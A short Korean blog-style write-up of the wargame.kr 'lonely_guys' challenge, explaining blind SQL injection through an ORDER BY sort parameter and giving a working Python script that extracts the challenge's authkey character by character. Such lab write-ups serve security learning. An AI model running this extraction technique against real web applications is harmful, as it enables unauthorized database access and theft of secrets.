[wargame.kr]lonely_guys

order by 를 이용한 sql injection인데

참고 : http://n3015m.tistory.com/173

order by (select 1) 같이 쿼리문이 들어갈 수 있고

order by (select 1 from guys_tbl where XXXXX) 했을 때 XXXX가 참이면 select문 결과가 여러 row로 나오게 되고 그러면

전체 쿼리문이 false 가 된다.

이를 이용한 스크립트 

아 post에서 content-type 헤더를 깜박해서 삽질햇당 ㅠ 멍청..ㅠ

import http.client
import string
from urllib import parse
import time
def blind(q):
	con=http.client.HTTPConnection('wargame.kr:8080')
	head={'Content-type': 'application/x-www-form-urlencoded','Accept': 'text/plain','Cookie':####}
	params=parse.urlencode({'sort':',(select 1 from guys_tbl where '+q+') desc'})
	con.request('POST','/lonely_guys/index.php',params,headers=head)
	res=con.getresponse().read()
	#print(res)
	return b'jacob' in res
#test
#blind('desc')
char='0123456789'+string.ascii_letters
## length ###
#(select%201%20from%20guys_tbl%20where%20(select%20length(authkey) from authkey)=40)%20des
leng=40
print(char)
ans=''
for i in range(0,41):
	for j in char:
		#print(ans)
		q='(select ascii(substr(authkey,{},1)) from authkey)={}'.format(i,ord(j))
		if not blind(q):
			ans+=j
			print('[*]find '+ans)
			break
print(ans)